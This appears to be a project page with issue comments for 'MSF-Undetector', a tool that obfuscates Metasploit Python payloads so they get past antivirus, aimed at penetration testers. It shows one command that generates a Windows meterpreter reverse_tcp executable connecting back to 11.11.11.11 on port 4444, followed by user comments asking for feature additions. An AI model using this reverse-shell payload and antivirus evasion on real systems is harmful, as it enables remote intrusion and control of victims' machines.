MSF-Undetector
MSF-Undetector copied to clipboard
Metasploit python-payload obfuscation, to allow penetration testers bypass Antivirus solutions.
Here is the input: `python msfud.py -p windows/meterpreter/reverse_tcp -a 11.11.11.11 -l 4444 -o msfudd.exe` And here is the output : `[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload`...
**HD MOORE** have witten RC files support in metasploit to assist developers automating the framework.. looking at your sourcecode i see **that metasloit handler its not automated lauched** .. we...
I will add support for PyInstaller hidden imports, required for single executables. The script will analyse every single import of the decoded metasploit payload and generate a file to be...
kindly add -b option to eliminate such bad char I.E \x00 ,\xff . \x0a etc..